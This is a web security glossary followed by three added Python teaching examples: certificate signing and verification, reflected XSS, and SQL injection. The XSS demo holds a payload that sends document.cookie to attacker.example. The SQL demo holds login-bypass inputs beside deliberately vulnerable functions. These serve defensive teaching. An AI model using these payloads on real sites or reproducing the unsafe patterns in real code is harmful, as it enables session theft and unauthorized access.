GLOSSARY OF WEB SECURITY TERMS
Secure Sockets Layer (SSL) | A cryptographic protocol that encrypts and authenticates the traffic between a browser and a web server so that information cannot be read or tampered with while it is in transit (adapted from the Bank One website). Used by essentially every e-commerce web site to protect its transactions. SSL itself is now deprecated in favor of its successor, TLS, although the name "SSL" is still widely used for both.
Secure Server | More than a web server that uses the SSL protocol; the term also implies that the server is reliable, backed up, expandable, and resistant to attack. (O'Reilly)
Certificate Authority | Authority trusted by one or more users to create and assign certificates. (from Wilde's WWW Online Glossary) |
Digital Certificate | A digital certificate is an electronic "credit card" that establishes your credentials when doing business or other transactions on the Web. It is issued by a certification authority. It contains your name, a serial number, a validity period (not-before and not-after dates), a copy of the certificate holder's public key (used by others to encrypt messages to the holder and to verify the holder's digital signatures), and the digital signature of the issuing authority, so that a recipient can verify that the certificate is genuine by checking that signature against the authority's public key, along with the validity period and the name. (Sans)
Certificate-Based Authentication | Certificate-Based Authentication is the use of SSL/TLS and certificates to authenticate one or both ends of a connection (the server always; the client optionally, with a client certificate) and to encrypt HTTP traffic, i.e. HTTPS. (Sans)
Encryption | Encoding data into a form that conceals its original meaning so that it cannot be read or used by anyone who does not hold the corresponding decryption key.
PCT (Private Communication Technology) | Microsoft designed PCT to improve on Netscape's SSL, but abandoned it when SSL was standardized by the IETF as the TLS protocol. You might still see a few sites, such as Expedia, say they use it.
TLS (Transport Layer Security) | Developed as the successor to SSL; the main difference is that TLS is an open, IETF standards-based protocol (TLS 1.0 is RFC 2246, the current TLS 1.3 is RFC 8446) rather than a single vendor's specification.
Cross-Site Scripting | Cross-site scripting (XSS) is an attack in which an attacker's script is delivered to other users of a web site through the site itself, typically to steal session cookies or to act as the victim. It occurs when the application places user-controlled input into a page without encoding it for the HTML context it lands in: reflected XSS echoes input from the current request, stored XSS serves input saved earlier (a comment, a profile field), and DOM-based XSS happens in client-side script. Output encoding, not merely filtering for the word "javascript", is the fix. (Owasp)
SQL Injection | Technique by which attackers execute SQL statements of their choice on the back-end database by manipulating input that the application concatenates into a query; parameterized queries are the standard defense. (Owasp)
Buffer Overflow | A buffer overflow occurs when a program or process writes more data into a buffer (a fixed-size block of temporary storage) than it was sized to hold. The extra data, which has to go somewhere, spills into adjacent memory, corrupting or overwriting the valid data held there: other variables, heap metadata, or a saved return address. If the overflowing data is attacker-controlled, the result is often a crash or the execution of attacker-chosen code. (Sans)
Denial of Service | The prevention of authorized access to a system resource or the delaying of system operations and functions (Sans) |
Trojan Horse | A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program. (Sans) |
Phishing | An official-looking but fake e-mail (or other message) that directs you to a look-alike copy of a company's web site in order to collect financial information or passwords.
Zero-Day | A new vulnerability that is exploited, or publicly known, before the vendor has a patch available; because there is no fix to install, it is difficult to guard against except through other layers of defense.
Mobile Code | Programs that augment the functionality of browsers by asking users to download and run additional code (e.g. plug-ins, ActiveX controls, Java applets, Flash). Such code runs with the privileges of the browser user, so its source must be trusted.
SET (Secure Electronic Transaction) | Secure Electronic Transaction is a protocol developed by Visa and MasterCard for credit card transactions in which all parties (customer, merchant, and bank) are authenticated using digital signatures, encryption protects the message and provides integrity, and end-to-end security is provided for credit card transactions online. (Sans) It has fallen out of favor, but could still return.
An extremely comprehensive glossary can be found in the SANS Institute's Glossary as well as in Wilde's WWW Online Glossary.
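The entries for Certificate Authority, Digital Certificate and Certificate-Based Authentication above describe a certificate as fields plus the issuer's signature. The following is an added example, not code from this glossary or from any of the sources it cites, showing a toy CA issuing a certificate and a relying party verifying it. It uses textbook RSA over two Mersenne primes with no padding, which is enough to show the signature check but is not a secure signature scheme; the CA key, the subject name "shop.example" and the holder's public key are all constructed placeholders.

```python
"""Toy model of how a certificate authority issues a digital certificate and
how a recipient verifies it.

Added example, not code from the glossary or its sources. Textbook RSA with no
padding is used only to make the signature check visible; real CAs sign
DER-encoded X.509 structures with padded RSA or ECDSA.
"""
import hashlib
import json

# Constructed CA key pair. Real CA keys are large random primes kept in an HSM.
_P = 2**127 - 1
_Q = 2**521 - 1
CA_MODULUS = _P * _Q                       # public
CA_PUBLIC_EXPONENT = 65537                 # public
_CA_PRIVATE_EXPONENT = pow(CA_PUBLIC_EXPONENT, -1, (_P - 1) * (_Q - 1))  # secret


def _digest(fields):
    """Hash of the canonical 'to-be-signed' fields; a SHA-256 value fits below the modulus."""
    canonical = json.dumps(fields, sort_keys=True).encode()
    return int.from_bytes(hashlib.sha256(canonical).digest(), "big")


def issue_certificate(subject, serial, not_before, not_after, subject_public_key):
    """The CA binds a name to a public key by signing the fields with its private key."""
    fields = {
        "issuer": "Toy CA",
        "subject": subject,
        "serial": serial,
        "not_before": not_before,          # ISO dates, so they compare as strings
        "not_after": not_after,
        "public_key": subject_public_key,  # the holder's key as [n, e]; a placeholder here
    }
    signature = pow(_digest(fields), _CA_PRIVATE_EXPONENT, CA_MODULUS)
    return {"fields": fields, "signature": signature}


def verify_certificate(cert, expected_subject, today):
    """What a browser does with the CA's public key: check the signature, the
    validity period, and that the name matches the site being visited.
    Returns a reason string on failure, or None when the certificate is valid."""
    recovered = pow(cert["signature"], CA_PUBLIC_EXPONENT, CA_MODULUS)
    if recovered != _digest(cert["fields"]):
        return "signature does not match the certificate fields"
    fields = cert["fields"]
    if not (fields["not_before"] <= today <= fields["not_after"]):
        return "certificate is outside its validity period"
    if fields["subject"] != expected_subject:
        return "certificate was issued to a different name"
    return None


if __name__ == "__main__":
    cert = issue_certificate("shop.example", 1001, "2025-01-01", "2026-12-31",
                             [1234567890123, 65537])
    print("genuine:", verify_certificate(cert, "shop.example", "2025-06-01"))
    # Tampering with any field breaks the signature, since the CA key is needed to re-sign.
    forged = {"fields": dict(cert["fields"], subject="bank.example"),
              "signature": cert["signature"]}
    print("forged:", verify_certificate(forged, "bank.example", "2025-06-01"))
```

The three checks in verify_certificate are the ones that matter in practice: a certificate with a valid signature is still useless to an attacker if it has expired or names a different host, which is why browsers refuse a connection on any of the three.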
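The Cross-Site Scripting entry above says the fault is inserting user input into a page without encoding it for its context. The following is an added example, not code from this glossary or from OWASP, showing a reflected XSS in two contexts (a text node and a quoted attribute) beside the encoded version; the two attacker payloads and the host attacker.example are constructed for the demonstration.

```python
"""Reflected cross-site scripting: the server echoes request input into HTML.

Added example, not code from the glossary or OWASP. The *_unsafe functions
show the vulnerable pattern and the *_safe ones the fix: encode the input for
the HTML context it lands in.
"""
import html

# Constructed attacker payloads. The first relies on a <script> element in a
# text context; the second needs no script tag at all, it closes the quoted
# attribute it lands in and adds an event handler.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def search_page_unsafe(query):
    """Vulnerable: the search term is concatenated straight into a text node."""
    return f"<p>Results for: {query}</p>"


def search_page_safe(query):
    """Fixed: HTML-encode (<, >, &, quotes) before inserting into a text node."""
    return f"<p>Results for: {html.escape(query)}</p>"


def search_box_unsafe(query):
    """Vulnerable: the term is placed inside a quoted attribute without encoding,
    so a double quote in the input ends the value and starts new attributes."""
    return f'<input name="q" value="{query}">'


def search_box_safe(query):
    """Fixed: quote=True also turns the quote characters into &quot;, so the
    attacker's text stays inside the attribute value."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


if __name__ == "__main__":
    print(search_page_unsafe(SCRIPT_PAYLOAD))   # a live <script> element
    print(search_page_safe(SCRIPT_PAYLOAD))     # &lt;script&gt;..., rendered as text
    print(search_box_unsafe(ATTR_PAYLOAD))      # onfocus handler becomes a real attribute
    print(search_box_safe(ATTR_PAYLOAD))        # stays inside value="..."
```

A blocklist that looks for "<script" or "javascript" would pass ATTR_PAYLOAD untouched, which is why the defense is encoding on output for the specific context (text, attribute, URL, script) rather than filtering on input.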
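The SQL Injection entry above describes manipulating input that the application concatenates into a query. The following is an added example, not code from this glossary or from OWASP, showing a login query built by string formatting beside the parameterized version, run against an in-memory SQLite database; the table, its two accounts and the attacker inputs are constructed for the demonstration.

```python
"""SQL injection against a login query, using sqlite3 from the standard library.

Added example, not code from the glossary or OWASP. Passwords are stored in
clear only to keep the query short; real systems store salted hashes.
"""
import sqlite3


def make_db():
    """In-memory database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_unsafe(conn, username, password):
    """Vulnerable: user input is pasted into the SQL text, so quotes and the
    '--' comment marker in the input change the structure of the statement."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Fixed: a parameterized query. The SQL text is constant; the driver passes
    the input as data, so a quote in a username is just a quote."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    # Constructed attacker inputs: the comment marker discards the password check.
    print(login_unsafe(conn, "alice' --", "wrong"))        # ['alice']: logged in as alice
    print(login_unsafe(conn, "' OR '1'='1' --", "wrong"))  # ['alice', 'bob']: every account
    print(login_safe(conn, "alice' --", "wrong"))          # []: rejected
```

With the first payload the executed statement becomes `SELECT username FROM users WHERE username = 'alice' --' AND password = 'wrong'`, i.e. everything after the comment marker is ignored; the parameterized form instead looks for a user literally named `alice' --` and finds none.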